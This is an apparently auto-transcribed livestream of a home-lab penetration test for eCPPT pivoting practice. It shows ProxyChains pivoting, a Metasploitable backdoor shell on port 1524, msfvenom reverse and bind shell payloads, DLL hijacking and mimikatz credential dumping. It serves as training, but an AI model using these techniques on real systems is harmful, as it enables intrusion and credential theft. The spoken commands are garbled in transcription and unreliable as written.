this guy right here, he's actually metasploitable. So we can actually try to look at 10.20.20.9 on one of these machines that can actually connect to him. I wonder if he can do it. 10.20.20.9. Alright, we see metasploitable 2 like right here, right? Cool, never expose VM to an untrusted network. Let's go ahead and do a ProxyChains for FTP on 10.20.20.9. Alright. And we can anonymous login. Can we do that? Enter dir. Bind address already in use. We can go ahead and actually search for that and actually do some stuff for this. If I actually go back over to here, it's my actual machine here. We actually click on that because I've had this problem before. FTP legal port. It's actually pretty cool. So we can actually do solutions quote PASV and then passive mode. Alright, so type in passives. We can actually just do that. And this will actually work again. So if we do that, and then PASIVE, dir, and there we go. Look at that, how we get a directory. There's nothing in there, okay, because we are on metasploitable. But cool, we're getting somewhere, right? Cool. Now we just need to be able to get into metasploitable because it is metasploitable. And like I said before, this is not a exploit class on, you know, web exploitation or Windows exploitation. It is a proxy class on pivoting. We're just going to go ahead and we're going to do a ProxyChains telnet on 10.20.20, what IP address is that? 10.20.29 on port 1524. Alright, and I am root. So I've now made it to root on DMZ. According to the eCPPT, I passed. But I didn't quite pass because I still have yet to look at 10.0.0.6. So let's go ahead and look at that. We do have a password for it now. So let's try to do it with that SMB17 that we showed before. So let's go ahead and search for MS17. Let's try to use that psexec. Use 9 maybe. Show options. Set our host to 10.0.0.6. Set SMB user to Audi. Set SMB pass to password 123. We'll go ahead and run that. And that's not going to work. Okay. That's okay. Let's go ahead and search for psexec. Use 10. Show options. That is still a reverse, right? We can't use a reverse. Let's go ahead and set the payload to a Windows interpreter bind TCP, right? Let's go ahead and try that. Set our output or show options again. Set our host to 10.0.0.6. Let's go ahead and run that. Ooh. Set our user, should we set our SMB user to Audi, set our SMB pass to password 123. That's not how that works. There we go, and we'll go ahead and run that. Still nothing. Okay, so now we're getting a little crap. You know, this is like where you start to feel like I'm gonna fail, right? I think my son just opened up his door. Oh, there he is. Come on, bud, keep it coming. Oh, nope, there he goes. Gotta go to the bathroom. So now you're getting to that little like jittery in the stomach, right? Like, oh crap, I can't get to this, right? I can't do this like right now. So this is like where you take a break, you start texting your buddies and everything, and everyone says, I don't know. Okay. Let's go ahead and let's stop trying to use Metasploit. Let's stop trying to get a bind shell open. We can't get a reverse shell. We know we can't do that, right? Let's go ahead and stop trying to get a bind shell open. And let's go ahead and do something with MSF Venom. Alright, so if I do my LSTAC LA, I made my shell.exe, although I totally forgot. Yeah, 10.0.42222. Okay, so let's go ahead and let's try RDP as Audi into password 123. So let's go ahead and try to do that. So we'll exit out that remnant over there, stop him over there, type in remnant again, ProxyChains, remnant. We'll say cancel like right here, and we're going to go ahead and do 10.0.0.6. Yes, and we're going to log in Audi and password 123. Okay, cool. Yes.
What are you doing?
I'm logging into your computer.
Why? It's off.
No, I know. So you think. I'm just that good.
No,
that I can actually get into stuff when it's off.
And it's a lowercase a.
Yeah, I know, Audrey. You're just the name on the box. That's all. That's your password. Password 123. You brute forced it.
That would also never be my password.
I know it would never be your password. I understand that.
Just FYI for your listeners.
Well, they could try password 123 8 million times. It's okay. Alright, so we're going to try to get in, or we're going to try to remote desktop it as Audrey. And what we're going to do from here is we are going to try and, I love you, and we are going to try and download a file. So we know that this guy should be able to reach 10.0.0.15, right? So he should be able to get to 10.0.0.15. If I hit enter, he can get there. Can he get to shell.exe? Yeah, he can. Alright, now this was a reverse TCP, right? Good save. Alright, so this is a reverse TCP, right? So let's go ahead and do a session stack I. Her password are actually probably better than mine in all honesty. Sessions 2, I get lazy. Sessions 2, right? Shell, NC, tag LVMP 2222. Alright. And from here, we will try, and I guess we'll just try to run it at first. See if we get anything. We did remote desktop in. Windows Defender Smart Screen prevented unrecognized app. More info. Run anyway. Can we do that? Like I said, I've yet to try it on here. So Windows Defender does not really want to run that. But Windows Defender is also turned off, it looks like. Dismiss. Oh, and I need the administrator information for this guy. Firewall is turned off. But I know that bind is not going to work on him. I've already tried that, listening on that. So right now, like I said, this is just kind of me just messing around. We got through the DMZ and everything like that. This is kind of me just having fun now. Let's try to... Can we do that shell.exe? It really does not want me to do this, huh? Run it. It's going to say, hey, you can't do that. Smart screen. Run anyway. And we're not getting anything back over here. We should be getting something back over there. That's what we should. We should be seeing something on here. Right. Now, if I actually stop this over here, we're going to have a lot of problems. We're going to have way more problems, right? So let me go ahead and try to do a SSH on pi at 10. Can I do that? Okay, so I'm in there now. I want to try to do an NC TAC LVMP 2222. The address is already in use. Okay, so let's go ahead and make up another one of these guys for 3333 maybe. And also, I actually don't want to be in this one. So I'm going to exit out of here. And I actually want to do a ProxyChains SSH into pi at 10.0.0.15. Yes. Password, I want to do Raspberry. There we go, okay. And from here, I have them both in here. NC TAC LVMP 3333. Right, there's that one over there. It's under shell.exe. Let's go ahead and upload that now. Let's go ahead and do a LSTAC LA. Let's go ahead and remove tac rf shell.exe. Shell, remove tac rf shell.exe, and then go ahead and do a wget, or I'll just do an upload shell.exe. Alright, and from here, he's already listening. We can go back to this guy and try to run shell.exe. Run it. That should be on port 3333 now. We'll try to run it, and we sure as hell we get a call back. So you see, it can't call back to me. It can't call back over to here. He can't talk to me, but he can talk to the web server. So now what we can do is we can start to create users. Now what we can do is we can start to, try and get into PowerShell. Maybe start running power exploit scripts, power up, everything like that. That's correct, GoPro Slow Yo. That's freaking money. Like I said, I didn't try that one. I wanted to have something that was, that I've done in the past, but not on my own machine yet. So I want to try something that was more black boxes. I came in there not really knowing. I want to have at least one thing. You gotta test yourself every once in a while. But now we have that. Back to here. Now we can run commands that will tear down firewalls, things like that. But if I do a who am I, maybe /priv, I don't know. Maybe I can figure out who I am or whatever. Nope. Let's go and cd into C users. So we also have Ryan in here. We also have an Alice in here, administrator. So I want to cd into Ryan. Can I do that? Okay. cd in desktop. cd maybe in a share. That's weird. Okay. And we have cav remover.exe and cav remover enu.dll. We saw something about cav remover before, right? So let's go ahead and cd back. cd into products. Type to do.text. Type to do.text. Okay. Check for buffer overflow on other machine. Fix DLL problem in cav remover on desktop. Okay, so this guy's saying that there's a DLL problem within cav remover. Okay. So let's go ahead and cd back. dir. cd into that products again. dir. Or cd into share. You see there's a problem with this, like right here, cav remover enu.dll. Now what I'm wondering is, first off, can I delete that? Is that even how you delete, first off? I don't even know. Hey, it is. I am amazing. No. What I'm worried is, can we upload a different cav remover on there and maybe upgrade our privileges? Like, what is that running as? Can I run it with PowerShell? Okay, I can be PowerShell. Okay, cool. Net user. Okay, so the administrator, so we have administrator, guest, Ryan, and Audie. Okay. Net local group, is that what it is? That thing? No. Okay, net local groups, so we have all this stuff in here, right? For admin, this is for admin. PowerShell users. Okay, now what I want to see is, can we go ahead and do another cav remover? Do we have wget on here first off? That makes my life way easier. Invalid URI. Okay, so we do. Okay, so let's go ahead and I guess do MSF Venom, TAC P, Windows shell reverse TCP 10.0.15, blah blah blah. Okay, it's going to be TAC F. This time it's going to be a DLL file, right? And we're going to do cav remover enu.dll. Alright, because it's going to be the same information. L port will make it 5555. Should be pretty much the same exact stuff, right? Let's go ahead and do a. And as you can see, how my terminals keep getting bigger and bigger. This was a problem I was having with eCPPT. So something I started doing was actually started opening up other desktops on it. And it's how bad it got. Like I started actually like opening up like other like these guys, stuff like that. So you can see how much, stuff is happening right here. And I was hiding things like this and everything. You have to kind of remember what you're doing. So from here, let's go ahead and let's upload, first off, cav remover. Because we have seen cav remover and cav and this stuff in a lot of different places now, right? We saw it in SMB. We now saw it in the to-do.txt. Yeah, we saw it within that Wireshark document, a whole bunch of it, right? So let's go ahead and we upload that into there. Now we need to do a wget for it, right? So wget HTTP 10.00.15 / cav remover enu.dll. Can I do that? Because the Internet Explorer engine is not available, or Internet Explorer's first launch period is not complete. You really trying to use Internet Explorer? Is that what you're trying to do to me like right now? Okay, fine then. We'll do 10.00.15 / cav remover enu.dll. Now this I have done before on this machine. The reason for that is because this is one of the boxes that I submitted up to TryHackMe, which was actually denied. This one was denied. Let's go ahead and save that. Just got the email today. It was rejected. That's what it said, rejected. It's a little butthurt. I don't care. They wanted a different way into it. Alright, let's go ahead and get into desktop, which is okay with me. More. Oh yeah, I know, I'm trying to save it. Kind of like this PC, desktop. Well, why can't I just like save it in like C drive, users? Okay. It was in Ryan, right? C drive user Ryan. It was in desktop, share, right? Is that correct? Yeah, it was in here, and then save that. Cav remover enu DLL finished downloading. Cool. So now all we have to do is stop and start that service. Have you made other boxes? Hack the Box will pay you. Hack the Box will pay you? Really? I have not. Well, I have made other boxes. Every single one that I make, they keep denying. So one of them was an SEH buffer overflow. They didn't like that one because I think it was one of the ones that were actually using INE. I think it was like, but it was one of the ones that were public, that you could actually download it and stuff. So I was going to write like my own program, do like SEH buffer overflows or whatever. But I think it was something like that. But that was denied, and then there was like a couple more, but a couple more of them were just like really easy ones. So okay, so we have C users Ryan desktop share. We have cav remover in here now. Now we need to start and stop a service. So let's first try to figure out how do we look up a service. So how to see services. Running in Windows. We do actually. I mean, we could actually really easily. I think actually do this because I do have that remote desktop open, huh? So we might just be able to do something like that. Let's go ahead and make sure that we can SS ProxyChains SSH. That's going to be pi at 10.00.15, and we'll do Raspberry sudo su, and we're going to do an nc tac lvmp 5555, because we're going to wait for a callback from there and see if I change users pretty much. Right now my who am I is Audi. I want to see if I can change users to admin/Audi. Okay. Maybe that's who I actually want to be. I don't know. I have no idea. Alright. Let's go ahead and see if that cav remover is an actual issue. So let's try to start it up, I guess. And get into here and go into my desktop. It's not where I want to go. Maybe this PC, C drive, I mean. C drive. Users. Ryan. Desktop. Share. Cav remover. Maybe try to start it up. Need an administrator password to continue to enter an admin user name and password. I don't know. I have no idea. Or if we need to know who the hell Ryan is. Ryan desktop share. Or if that has to do with let's go ahead and try to do a SMB client. or not SMB client, a Hydra. See what, try to figure out what the hell Ryan's password is. Tech L Ryan. Yeah, SMB is a 10.006/share, I think it was. Yeah, or /users. Let's try to run that. See if we get anywhere. That's not going to work because I didn't even do ProxyChains in front of it. No reply for target SMB 10.006/445. Well, you know what? This may not actually work for me. I do know what the administrator password is. And I may have deleted the hint of what it was, which I'm pretty sure I did because I'm pretty sure it was actually on the desktop, and the hint was waterfall. Just so you guys know. I don't know if you guys know what waterfall is, but if you do a waterfall, what that supposedly is 1 down, 2 down, shift 1 down, 2 down. It looks like I just started this guy up, and cab remover enu.dll did not do anything for me. It's not actually showing up into here at all, or making that call back anywhere, which I'm pretty sure I thought it would. Actually, I really thought that would. Shell reverse TCP to lhost 10.0.0.15, lport 5 tag fdll, cab remover enu.dll. I'm actually really surprised that it has yet to make that call back. So I'm not really too like, oh my god, we need to get this guy up and running and working and stuff like that. I'm just happy that I even got into him because I totally forgot how to even get into this guy. So maybe I'll just start cab remover. Is that how you do it? Yep, that's exactly how you do it. You have to do maybe I have to like run as administrator or something like that. Seems like he already is running as administrator. I'm gonna try it, but I don't know. I don't remember how. But yeah, that cab remover enu.dll that actually should. I think I've actually showed this one before. You can actually have this one before on stream. That should actually create a callback to me. Maybe I need to do it a different way. Maybe I need to do it like, let's see here, MSF Venom, TAC P, Windows, /10.0.0.15, maybe make it not an x64, like Windows Shell, reverse TCP like that, TAC FDLL, we'll call that cab remover again, cab remover enu.dll. Enter. We'll try that like right there. I'm pretty sure it's cab remover enu.dll also that I need to do. Pretty sure it's that one like right there. That looks pretty good. 5,120 bytes. So we'll go ahead and delete that. Let's go ahead and upload this guy over here. Upload or actually delete or remove shell tech rf cab remover DLL. Okay, so let's go ahead and upload cab remover again, .emu. We just deleted it from there, so let's go ahead and re-download that. We'll go ahead and save him, save as, and we'll throw him into should be .dll. Also, and he should be in there. Yep, save, and we're good with that. Exit off here, and let's go ahead and try to run cab remover again one more time, and see if we get a call back. If we don't, that's okay with me. Like I said, this was not a Windows privilege escalation class. This was not a Linux privilege. No, it wasn't anything like that. It was a proxy class. I didn't test any of this stuff beforehand. I'm happy to even got this far into it. I think that's pretty cool. But yeah, you can also make a DLL file over here. You can search DLL. Alright, DLL inject. There's a bunch of stuff you can do with DLL modules, things like that. So different stuff you can do in them. Okay. We could try to do a bind TCP, things like that. We could try to do a reverse TCP and everything like that. Reflective DLL injection, a bunch of stuff we can do. But that's also going a little bit above and beyond eCPPT, doing anything with DLL injection. Once you do that, you should be able to start service. You should be able to make a callback. For some reason, it doesn't really want to. It seems like session tech I, sessions 2, IF config, And it is 10.00.15. I am doing 10.00.15. Alright, so I don't know why it's not able to make that callback or why it's not trying. It could be something with Smart Defender maybe. It could be something with, let me see here, real-time protection. Let's go ahead and do a Defender. I guess Windows Security. I don't know what the hell it's called nowadays. Account protection. Public. Advanced settings. I want to see if real-time protection is turned on or not. I'm pretty sure. No, it's not advanced settings. I always forget where this is at also. So I keep saying that it's okay if we don't figure this one out. But then I keep coming back to it and trying to figure it out, you know. This is how I am, huh? Okay, so real-time protection is off. So I have actually no idea why it's not able to call back to him and get that connection. That's really weird to me. Like right there. I guess we could always try like a different rule. Like we'll try one more time. And we're also gonna go ahead and, because I mean, if it was really cab remover, we would look up cab remover ENU DLL file. We would look something like this up and be like, hey, can we even hack this or whatever? We will create a 32-bit payload DLL with MSF Venom. Okay, cool. So maybe MSF Venom, TAC-P, Windows Interpreter, reverse TCP, all port TAC-F, DLL, cab remover, ENU.DLL. So this is DLL hijacking, like right here. It is telling us like, hey, this is what they did, like right there. So yeah, that should have worked what we did. It's okay. I'm going to try one more thing. And what we are going to try this time is we are going to try to do a MSF Venom, Windows Shell, reverse TCP. We'll try it this style, Windows Shell, reverse TCP. And we're going to make our L port 443. TAC F. This time we will do a TAC O like that. That's saying, hey, save it. Okay, save that thing as that little greater than sign. Save that concept. We'll go ahead and we'll make one more of these. We'll do an LS TAC LA. Make sure I only have one in here. Cab remover ENU.DLL. Cool. Let's go ahead and upload cab remover ENU.DLL. Show like where I am. I'm still in var www HTML. Make sure I only have one in there. I do. Cool. Let's go ahead and delete this one. And remember, now we're going through port 443. So NC TAC LVMP 443, right? So now let's go ahead and run that cab remover again. One more time. We'll save him. Save as. Alright, cab remover. And yep, .dll. Okay. Save it in that share folder like right there. And then from here we can go ahead and start up cab remover. And do our waterfall password. And yeah, we're not receiving anything back over here on this Raspberry Pi. Not too angry about that. Like I said before, eCPPT, not everything can be cracked. So there you go, not everything can be hacked. Maybe that's one of the things. But throughout this class, we did learn that we can use Hydra with ProxyChains. We did learn about ProxyChains, SOCKS 5, how to set up the network, how to move throughout the network, how to use SOCKS 5 within Metasploit, how to use ProxyChains for SMB, SMB client, God, everything. We sent a shell back to our web server over here, right? While he was listening, we sent a shell to him. Okay, I may have actually been able to start PowerShell on one of the other machines, and maybe had that machine talk back to him, the 10.0.0.6. We learned how to run Arp Scanner, learned how to do ARP requests, things like that. So Learned quite a bit of stuff. Getting ready for that eCPPT if you guys are going to take that one. And yeah, I think we learned a lot. Did a lot of stuff. Have a bunch of screens open like right now. Did run Gate GUI. Showed about the different interfaces. Showed about the different scripts that could be used. Remember the run, post, things like that. Okay. We can also do that with Windows, right? If I Control Z, yes. If I go ahead and go in sessions 4 or whatever, run, post. Okay, yes. And we have a bunch of stuff we can do in here, right? Like find VMX Firefox credentials, Jenkins gather, LastPass creds. We can do a bunch of stuff in here. Obviously, this is a real box or anything like that. We would obviously do a low kiwi, right? We would then from here do a hash dump. Do you stream at certain times? Go for slowly. I usually stream, do a hash dump. Usually stream at 9. Oh, I cannot do a hash dump with him at least. I usually stream at 9 p.m. Okinawa time. So whatever Tokyo time, yeah, you gotta kind of look it up. Let's go ahead and do a low kiwi into here. We'll try to do a hash dump in here. We could do like an LSA SAM dump or something like that. So let's go ahead and do a hash dump in here. Man, it does not want to do a hash dump, does it? Hash dump is not the thing today for me, is it? I think that's pretty funny. Let's go ahead and do a question mark again. We can go ahead and try to do a creds all. Treatment all credentials. Couldn't really find anything with that. LSA dump SAM, LSA dump secrets. So there we go. We got some NTLM hashes, right? So we can try to crack these hashes also, right? Instead of trying to brute forcing it, things like that, we try to crack those. We can go into the other one, try to crack those hashes. I have active duty, not in Tokyo, currently in Okinawa, in the Marine Corps. So that's why, like, my YouTube channel, that's why stuff like comes out. Like, I have stuff like way in advance, just in case, you know, I have to like leave or anything like that. Then, you know, stuff still continues to roll out. So we can dump that stuff and everything, right? We can do our hash dump. Usually you do hash dump when they will do it on this guy. That's okay. But yeah, I actually didn't really need to even get anywhere on this guy over here because I was able to at least get into him because I sent that call back to my Raspberry Pi, right? So I didn't really need to even do anything else because I didn't need to actually utilize him to route to anywhere else. So I didn't need to use our route. So I didn't need to get him over here. But if that was the case, from there what I would do is I would have an executable file. I might be able to actually still do an executable file. Let's try one more thing. Let's go ahead and try a bind address. Okay, I'm gonna try one more thing, just because, you know, this is a I'm having fun with it. Let's go ahead and do a MSF Venom, right? MSF Venom, TAC-P, Windows, shell, bind, TCP. Right, let's go ahead and Control Z, yes. We'll use exploit multi-handler. Should we do x64? Windows/x64? Probably. It's a Windows 10 machine, it looked like. We'll do an LATAC LA, or show options, show options, set our L port. L port is going to equal to 443. Our port, our host, is going to be equal to 10006. File type is going to be executable, and we'll call that bind.exe. Let's go ahead and try to upload something like this. Let's go ahead and do set our host as 10006. And we'll do a run tac, or set out port as 443. And we'll do a run tac J, run that in the background. Go back into sessions 2, upload bind.exe. Get in that PowerShell session that we had open earlier, 10006 / bind.exe. If the resources have been removed, has name share is temporarily unavailable. Lies. You lie like a rug. Oh, because I wrote down 10006, 10015, bind.exe. Let's go ahead and just run it. Run anyway. Don't you try to tell me what. And we do get a command shell session open. So now from here, let's go ahead and do a sessions tac I, or Control Z, yes. Sessions tac I. So I'm pretty happy we actually got that session open. Let's go ahead and search for shell 2, and let's set that U0, set session to 5. Let's go ahead and run that and see if we get into it anywhere, see what we can do. Doesn't look like we're getting anywhere with that interpreter session just yet, but that's okay. We did get a call back to Metasploit also. Alright, so we did open up a bind handler. So now if we open up a interpreter bind handler, we should be able to get that, right? So we can do another use exploit multi-handler. You see how we're just going through this again. Set pay or MSF Venom attack P Windows x64 / interpreter. That's what it should be. Set payload to Windows x64 interpreter, right? Yep, METER interpreter bind TCP. Awesome. So interpreter bind TCP, right? Boom, boom. Let's go ahead and set that out port. We can't do 443 like right now. Let's go ahead and do 6666. Alright. We'll call that mbind.exe. So let's go ahead and do a show options, set out port to 6666, run tag J, run him in the background now. And then from here what we'll do is a session tag I, sessions 2, and we'll upload, and he did not like that at all, probably because he has to be, probably because I have to spell it right. That's probably why. Mbind. That's probably why though. We'll probably have to spell it actually right to actually do it. Let's go ahead and try that now. 10.00.15 mbind.exe. Let's see if we get that call back over here with that interpreter shell, right? More info, run anyway. And we do, we get an interpreter session 6, session control Z, yes, session 6. Show options, or get UID. Right now I'm running as Audi, but it does say I'm an admin. It says admin Audi. Let's go ahead and run, let's see here, disinfo, maybe? Okay, yep, it sure enough is. We got logged on users. We have 9 logged on users somehow. Windows 10, okay, admin, boom, boom. Let's go ahead and see where am I right now? I'm in here, okay, temp state downloads. Wow, that's a weird spot, alright. PS, is there anything I can migrate to? And just, you know, start to really work on Windows. Like I said, this isn't a Windows class. This is a ProxyChains class. But, you know, we can start to look at, hey, what can we migrate into? What can we try to do? What can we, you know, look at with the service and everything? Can we do a load kiwi? Can we do a hash dunk? Can we do any type of anything like that? Can we do anything at all? Nope. Okay, so can we do creds all? Can we do, okay, yep. Can we do question mark? Can we do LSA dump SAM? Probably not. LSA dump secrets? Probably not. Okay. We can add a user in there. We can maybe try to do something with Kerberos, even though that's not going to work on this guy, obviously. We try to get system. That's most likely not going to work, though. It didn't. Alright. And we can just try all the different stuff. Alright, hey, you have a good one, GoPro Soyo. Have a good night. But that is going to be it for me tonight. I'm done. Hopefully you guys learned something. I already went through what we learned, and then I kept messing with this guy. So if you stuck with me this far, thank you very much. Thanks for all the people watching on Twitch like right now. I think it's the most viewers we've ever had. Thank you, GoPro Sloyo, for putting me on that GitHub page with all the Twitch, the other Twitch streamers and everything. And yeah, you guys have a good one, and I will see you later.